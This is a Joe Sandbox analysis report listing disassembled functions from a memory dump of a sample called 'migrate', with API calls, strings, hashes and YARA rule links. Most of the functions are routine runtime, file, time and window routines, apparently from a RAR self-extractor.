                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1353541977-0
                                                                                                                                                                                                    • Opcode ID: 92630a50606c73286a222a34709f0c609d0b1804f086dfec95ed2cf5dc477cc5
                                                                                                                                                                                                    • Instruction ID: 21abb49f3af49f674f15abb05e6597fe748c956ccb04c398348e723cae66ea23
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92630a50606c73286a222a34709f0c609d0b1804f086dfec95ed2cf5dc477cc5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7412C71A00229AFCB119F64EC45FAEBBB8EB58B10F11423EF815E7261D7349951C7E4
                                                                                                                                                                                                    Function 0011AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                                                    • API String ID: 3519838083-3505469590
                                                                                                                                                                                                    • Opcode ID: 056f4fbf85daee2fc1e3b33fc3b42a3ec5076bd6a2e0b35540f442f72e22f58f
                                                                                                                                                                                                    • Instruction ID: c991f510e279db3a9c369bd2d8f6d7d5593124090bc628d308cc170189b970df
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 056f4fbf85daee2fc1e3b33fc3b42a3ec5076bd6a2e0b35540f442f72e22f58f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB715E75A01619AFDB18DFA4CC95DAEBBB9FF49310B14016DF512A72A0CB306D82CB50
                                                                                                                                                                                                    Function 00119382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00119387
                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001193AA
                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001193C9
                                                                                                                                                                                                      • Part of subcall function 0011C29A: _wcslen.LIBCMT ref: 0011C2A2
                                                                                                                                                                                                      • Part of subcall function 00121FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0011C116,00000000,.exe,?,?,00000800,?,?,?,00128E3C), ref: 00121FD1
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00119465
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001194D4
                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00119514
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: rtmp%d
                                                                                                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                                                                                                    • Opcode ID: 91162eaebc49dbc21b2468bb33250d5705a47a548aab13c88f846fa2a3fdbeb4
                                                                                                                                                                                                    • Instruction ID: a86c7b6c4892c6b241d7a03b2247ff52ef42f88cf63d86dacbe327ef0579aa51
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91162eaebc49dbc21b2468bb33250d5705a47a548aab13c88f846fa2a3fdbeb4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141A77190026466DF65EBA0CD65EEE737DAF55340F0048B6B629F3052EB388BC9CB60
                                                                                                                                                                                                    Function 00121218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 0012122E
                                                                                                                                                                                                      • Part of subcall function 0011B146: GetVersionExW.KERNEL32(?), ref: 0011B16B
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00121251
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00121263
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00121274
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00121284
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00121294
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001212CF
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 00121379
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1247370737-0
                                                                                                                                                                                                    • Opcode ID: 6b5f055ae924a06867789863dfab067659675af476e7eb94d9e89e86ba409742
                                                                                                                                                                                                    • Instruction ID: 4bef890410022baa432363ab9ed672ccad48286a29b28d30ac4c3ee214671157
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5f055ae924a06867789863dfab067659675af476e7eb94d9e89e86ba409742
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F64145B6508305AFC710DF65D88096BFBF9FB88714F00892EF596C2610E734E659CB52
                                                                                                                                                                                                    Function 00112210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00112536
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                      • Part of subcall function 001205DA: _wcslen.LIBCMT ref: 001205E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                                                                                                    • Opcode ID: f2e9cd42f33409528617ab0c90d20b807f36d7a18e24a2c365e06a4a96b80828
                                                                                                                                                                                                    • Instruction ID: 639c9de84f841edcb52bac790079445451dbbf97e6d817ed6ddd1122cf3b8ed4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2e9cd42f33409528617ab0c90d20b807f36d7a18e24a2c365e06a4a96b80828
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF104706082819BCB2DDB248495BFE77D66BA4300F08057DFD8A9B283DB748DD5C7A2
                                                                                                                                                                                                    Function 00129CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                                                                                                    • Opcode ID: c46ce704a0085d4118bff23d2a6bb7c0ede7b81162e0c4c85378e6db7aac9361
                                                                                                                                                                                                    • Instruction ID: 0808875cfee8aff5a1cfe0955a1d5c0f8f4781a8d2606130a752e36ac7471701
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c46ce704a0085d4118bff23d2a6bb7c0ede7b81162e0c4c85378e6db7aac9361
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C351596670037795DB349A6DB8217B673E0EFA1750F6A042AF9C18B1C0FB658CA19361
                                                                                                                                                                                                    Function 0013F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0013FE02,00000000,00000000,00000000,00000000,00000000,0013529F), ref: 0013F6CF
                                                                                                                                                                                                    • __fassign.LIBCMT ref: 0013F74A
                                                                                                                                                                                                    • __fassign.LIBCMT ref: 0013F765
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0013F78B
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0013FE02,00000000,?,?,?,?,?,?,?,?,?,0013FE02,00000000), ref: 0013F7AA
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0013FE02,00000000,?,?,?,?,?,?,?,?,?,0013FE02,00000000), ref: 0013F7E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                    • Opcode ID: 460043ffc9514ef90c0d35f4dcdfe73c4e82f9f897547ef61bfac44e5c900043
                                                                                                                                                                                                    • Instruction ID: 932461b39f7af0a449f6427b07a22a0bcb58081466c58d662e853d9d47d77c25
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 460043ffc9514ef90c0d35f4dcdfe73c4e82f9f897547ef61bfac44e5c900043
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C95173B5E00249AFDB14CFA8DC85AEEBBF4EF09310F14416EE555E7251D770AA42CBA0
                                                                                                                                                                                                    Function 00132900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00132937
                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0013293F
                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001329C8
                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 001329F3
                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00132A48
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                    • Opcode ID: 87b69c89deb4c90af65ff7d68b9a6048640891d75fe14b9ef2fcf95d3fbb0c2b
                                                                                                                                                                                                    • Instruction ID: 86e432b7487851d2607220ef4bc9619b06ea02822531bc4676b86f2be08204e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87b69c89deb4c90af65ff7d68b9a6048640891d75fe14b9ef2fcf95d3fbb0c2b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C41B534A00219AFCF10EF68C885B9EBBF5FF55328F148095E815AB3A2D771DA45CB91
                                                                                                                                                                                                    Function 00129ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00129EEE
                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00129F44
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00129FDB
                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00129FE3
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00129FF9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                                                                                                    • String ID: RarHtmlClassName
                                                                                                                                                                                                    • API String ID: 3937224194-1658105358
                                                                                                                                                                                                    • Opcode ID: cd1a5ad2ab5e8e9ae6ea7e3bc5775db8ab05b04df173f2f0ededf92ae32978c6
                                                                                                                                                                                                    • Instruction ID: ecfacdcb955d0efcfde070015e6b5f20ee34e4045fe47ff03c7def9c169478d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd1a5ad2ab5e8e9ae6ea7e3bc5775db8ab05b04df173f2f0ededf92ae32978c6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B41E271004320EFDB215F68EC48B6BBFB8FF48701F404559F8599A066CB34D9A4DBAA
                                                                                                                                                                                                    Function 00129955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                                    • API String ID: 176396367-3743748572
                                                                                                                                                                                                    • Opcode ID: e60506f56d2fe4bffe9b1a11a7018054f9169f9787d9716da7b07455c6be9b42
                                                                                                                                                                                                    • Instruction ID: 5a7eed8f320f155602376a4b155648cdf80eaa1bdc931382d82d8141aca79591
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e60506f56d2fe4bffe9b1a11a7018054f9169f9787d9716da7b07455c6be9b42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5831823264435566DA34AB5CBC43B7B73A4EB90330F60842FF496472C0FB90ADA183A5
                                                                                                                                                                                                    Function 0013C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013C868: _free.LIBCMT ref: 0013C891
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C8F2
                                                                                                                                                                                                      • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
                                                                                                                                                                                                      • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C8FD
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C908
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C95C
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C967
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C972
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013C97D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                                    • Instruction ID: 800e4b54f3b86b9f36c07b263607cf44f1b217e8ee085384dc1ed4e58be219c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6112172580B04AAE920B7B1CC07FCB7BAC9F24B10F404C55B39D76092DB75B6158790
                                                                                                                                                                                                    Function 0012E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0012E669,0012E5CC,0012E86D), ref: 0012E605
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0012E61B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0012E630
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                                                                                                    • Opcode ID: dc59b7c4084e7e1e012254315de1c5ec761e55d0c07cfdee45bb6a9ecb60db70
                                                                                                                                                                                                    • Instruction ID: 392037a5150aefd00d041e84e74340de08a49e604e8fcbc4074ecda145d64174
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc59b7c4084e7e1e012254315de1c5ec761e55d0c07cfdee45bb6a9ecb60db70
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21F02B317802326F4F224FB97D8557623E9AF26741B110539E905DB620EB10CCF45FA0
                                                                                                                                                                                                    Function 0012146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001214C2
                                                                                                                                                                                                      • Part of subcall function 0011B146: GetVersionExW.KERNEL32(?), ref: 0011B16B
